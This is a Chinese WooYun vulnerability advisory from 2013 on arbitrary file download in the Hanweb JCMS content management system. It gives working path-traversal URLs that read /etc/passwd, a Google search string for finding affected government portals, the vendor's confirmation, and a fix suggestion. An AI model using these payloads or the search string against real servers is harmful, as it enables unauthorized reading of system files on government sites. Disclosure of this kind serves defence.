当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035794

漏洞标题:大汉版通JCMS内容管理系统任意文件下载漏洞

相关厂商:南京大汉网络有限公司

漏洞作者: 鶆鶈

提交时间:2013-09-01 16:31

修复时间:2013-11-30 16:32

公开时间:2013-11-30 16:32

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-01: 细节已通知厂商并且等待厂商处理中
2013-09-04: 厂商已经确认,细节仅向厂商公开
2013-09-07: 细节向第三方安全合作伙伴开放
2013-10-29: 细节向核心白帽子及相关领域专家公开
2013-11-08: 细节向普通白帽子公开
2013-11-18: 细节向实习白帽子公开
2013-11-30: 细节向公众公开

简要描述:

多处任意文件下载,影响版本未知,大概都影响吧。

详细说明:

1. http://target/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt
要得到网站路径,访问:http://target/jcms/m_5_9/sendreport/,然后生成报表就看得到了。
2. http://target/jcms/m_5_e/init/comment/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd
3. http://target/jcms/m_5_e/init/guestbook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd
这个在乌云上已经有了: WooYun: 各类政府网使用某程序导致任意文件读取
4. 其它,如一些需要权限验证的下载页面

漏洞证明:

用这系统政府门户网站居多,上谷歌inurl:gov.cn/jcms一下,使用量不是很大,级别高点的也就是几个市级单位,厂商还得努力,拿软件官网www.hanweb.com测试一下:

837.jpg


修复方案:

限定下载目录,然后过滤".."?

版权声明:转载请注明来源 鶆鶈@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-09-04 22:09

厂商回复:

CNVD确认并复现所述情况,此前提交的漏洞因工作失误未及时确认,在此一并确认吧。CNVD已经对该应用软件进行特征提取,同时归入CNVD电子政务行业漏洞列表。
rank 15

最新状态:

2013-09-27:已修复。